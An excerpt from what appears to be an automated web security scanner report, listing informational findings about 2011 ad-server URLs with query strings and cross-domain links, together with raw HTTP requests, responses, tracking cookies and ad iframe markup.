document.write('<a href="http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.804.iframe.200x33/**;10.3181;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_30 years.jpg" alt="Online $7 Trades! Click to find out more!" />
...[SNIP]...

18.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**;10,3,181;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F%3B_ylt%3DAtqNTgBHv4UdcezC5xaY6tfTjdIF?click=http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*

The response contains the following link to another domain:

http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*http:/ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.269.iframe.200x33/**;10.3181;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 13:11:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4dce55b134194; expires=Thu, 14-Jul-2011 13:11:14 GMT; path=/
Set-Cookie: i_1=46:1354:269:44:0:44377:1307970674:B2|46:1354:804:44:0:44377:1307970673:B2|46:1354:804:44:0:44375:1307967073:B2; expires=Thu, 14-Jul-2011 13:11:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 743

function wsod_image1354() {
document.write('<a href="http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.269.iframe.200x33/**;10.3181;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_7_dNL.gif" alt="Online $7 Trades! Click to find out more!" />
...[SNIP]...

18.70. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/iframe3?UbwUAKamGwArOGcAAAAAAFB0IgAAAAAAAgAAAAoAAAAAAP8AAAACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABl1IWa7dI-CjC5RC68xQYCFUS-ABfl6WkI1WroAAAAAA==,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3F01ad%3D2-2-b0214141ded1291a4ff0463d9e06444bd5100362c216df15cc667f2767bc1758-991ad395e12a9826d82de593d62cfbcfae28214d0237d0e3f7994e1df381cb11%2601ri%3D6bdf326c1d1d9d9%2601na%3D%26size%3D160x600%26m%3D3%26l%3D1575606%26c%3D162,B%3D10%26Z%3D160x600%26_salt%3D3382701272%26r%3D0%26s%3D1812134,b9573eaa-95ac-11e0-bfb6-1cc1de044292

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3;abr=!ie4;abr=!ie5;sz=160x600;ord=1307962995?
http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3;sz=160x600;click=http://ad.yieldmanager.com/clk?2,13%3B0bde8e2c29093041%3B13088ab7308,0%3B%3B%3B2651300839,UbwUAKamGwArOGcAAAAAAFB0IgAAAAAAAgAAAAoAAAAAAP8AAAACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAB3OriDABAAAAAAAAAGI5NTczZWFhLTk1YWMtMTFlMC1iZmI2LTFjYzFkZTA0NDI5MgAAAAAAAAA=,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3F01ad%3D2-2-b0214141ded1291a4ff0463d9e06444bd5100362c216df15cc667f2767bc1758-991ad395e12a9826d82de593d62cfbcfae28214d0237d0e3f7994e1df381cb11%2601ri%3D6bdf326c1d1d9d9%2601na%3D%26size%3D160x600%26m%3D3%26l%3D1575606%26c%3D162,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%26v%3Dc%26c%3D6764587%26z%3D1307962995%26g%3D2258000%26l%3D2960776%26cv%3D0%26cm%3DCPM%26d%3D;ord=1307962995?
http://vt.imiclk.com/cgi/vtc.cgi?m=3&v=v&c=6764587&z=1307962995&g=2258000&l=2960776&cv=0&cm=CPM

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:15 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0088.rm.bf1
Set-Cookie: ih="b!!!!G!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!$='htu!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; path=/; expires=Wed, 12-Jun-2013 11:03:15 GMT
Set-Cookie: vuday1=!!!!#?:rWIGf(n`NBHr8/<?Sv; path=/; expires=Tue, 14-Jun-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!'!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htu=(g[7!!!(["; path=/; expires=Wed, 12-Jun-2013 11:03:15 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:03:15 GMT
Pragma: no-cache
Content-Length: 3710
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(6764587);}
</script><IFRAME SRC="http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3;sz=160x600;click=http://ad.yieldmanager.com/clk?2,13%3B0bde8e2c29093041%3B13088ab7308,0%3B%3B%3B2651300839,UbwUAKamGwArOGcAAAAAAFB0IgAAAAAAAgAAAAoAAAAAAP8AAAACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAB3OriDABAAAAAAAAAGI5NTczZWFhLTk1YWMtMTFlMC1iZmI2LTFjYzFkZTA0NDI5MgAAAAAAAAA=,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3F01ad%3D2-2-b0214141ded1291a4ff0463d9e06444bd5100362c216df15cc667f2767bc1758-991ad395e12a9826d82de593d62cfbcfae28214d0237d0e3f7994e1df381cb11%2601ri%3D6bdf326c1d1d9d9%2601na%3D%26size%3D160x600%26m%3D3%26l%3D1575606%26c%3D162,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%26v%3Dc%26c%3D6764587%26z%3D1307962995%26g%3D2258000%26l%3D2960776%26cv%3D0%26cm%3DCPM%26d%3D;ord=1307962995?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=''#000000''><SCRIPT language="JavaScript1.1" type="text/javascript">
...[SNIP]...
%3D2960776%26cv%3D0%26cm%3DCPM%26d%3Dhttp%3A%2F%2Fad.doubleclick.net%2Fjump%2FN3093.2630.AKAMAITECHNOLOGIES%2FB4852598.3%3Babr%3D!ie4%3Babr%3D!ie5%3Bsz%3D160x600%3Bord%3D1307962995%3F" TARGET="_blank"><IMG SRC="http://ad.doubleclick.net/ad/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3;abr=!ie4;abr=!ie5;sz=160x600;ord=1307962995?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Click Here"></A><IMG SRC="http://vt.imiclk.com/cgi/vtc.cgi?m=3&v=v&c=6764587&z=1307962995&g=2258000&l=2960776&cv=0&cm=CPM" BORDER=0 WIDTH=1 HEIGHT=1></NOSCRIPT></IFRAME><IMG SRC="http://vt.imiclk.com/cgi/vtc.cgi?m=3&v=v&c=6764587&z=1307962995&g=2258000&l=2960776&cv=0&cm=CPM" BORDER=0 WIDTH=1 HEIGHT=1></body>
...[SNIP]...

18.71. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/iframe3?bCIAALpTHQAqmW0AAAAAAD8wHAAAAAAAAgAAAPgAAAAAAP8AAAACB6pSJQAAAAAArFIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAntA8AAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABhHVDIvdI-CsNjvoy5R4ux8WeAKRiU5PX2mUdmAAAAAA==,,http%3A%2F%2Fd3.zedo.com%2Fjsc%2Fd3%2Fff2.html%3Fn%3D933%3Bc%3D56%3Bs%3D1%3Bd%3D15%3Bw%3D1%3Bh%3D1%3Bq%3D1190,B%3D10%26Z%3D1x1%26_salt%3D545127514%26r%3D0%26s%3D1921978,9cb8185a-95ac-11e0-ae78-472078ff7cfc

The response contains the following link to another domain:

http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1585&s=1&l=1&t=e&e=1

Request

GET /iframe3?bCIAALpTHQAqmW0AAAAAAD8wHAAAAAAAAgAAAPgAAAAAAP8AAAACB6pSJQAAAAAArFIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAntA8AAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABhHVDIvdI-CsNjvoy5R4ux8WeAKRiU5PX2mUdmAAAAAA==,,http%3A%2F%2Fd3.zedo.com%2Fjsc%2Fd3%2Fff2.html%3Fn%3D933%3Bc%3D56%3Bs%3D1%3Bd%3D15%3Bw%3D1%3Bh%3D1%3Bq%3D1190,B%3D10%26Z%3D1x1%26_salt%3D545127514%26r%3D0%26s%3D1921978,9cb8185a-95ac-11e0-ae78-472078ff7cfc HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=1921978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; ih="b!!!!D!'4@g!!!!#=$KA3!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; bh="b!!!%)!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:43 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0128.rm.bf1
Set-Cookie: ih="b!!!!E!'4@g!!!!#=$KA3!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!$='htT!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; path=/; expires=Wed, 12-Jun-2013 11:02:43 GMT
Set-Cookie: vuday1=Gf(naNBHr8YQl_X; path=/; expires=Tue, 14-Jun-2011 00:00:00 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:02:43 GMT
Pragma: no-cache
Content-Length: 350
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(7182634);}
</script>
<img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1585&s=1&l=1&t=e&e=1" width="1" height="1" border="0" >

...[SNIP]...

18.72. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/iframe3?AAAAAG5NDABbfDsAAAAAAFbVDwAAAAAAAgAAAAoAAAAAAP8AAAACB7YKGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4ZAYAAAAAAAIAAQAAAAAA7FG4HoXr-T.sUbgehev5PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADj2zl69I-Cp9kMtWtge5DYqRCnjMrzCXUcicpAAAAAA==,,http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F,B%3D10%26Z%3D160x600%26_salt%3D1199747959%26r%3D0%26s%3D806254,b7f8d118-95ac-11e0-934f-d33941452b63

The response contains the following link to another domain:

http://adopt.imiclk.com/emb/q?size=160x600&m=3&l=1575606&c=162

Request

GET /iframe3?AAAAAG5NDABbfDsAAAAAAFbVDwAAAAAAAgAAAAoAAAAAAP8AAAACB7YKGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4ZAYAAAAAAAIAAQAAAAAA7FG4HoXr-T.sUbgehev5PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADj2zl69I-Cp9kMtWtge5DYqRCnjMrzCXUcicpAAAAAA==,,http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F,B%3D10%26Z%3D160x600%26_salt%3D1199747959%26r%3D0%26s%3D806254,b7f8d118-95ac-11e0-934f-d33941452b63 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=806254
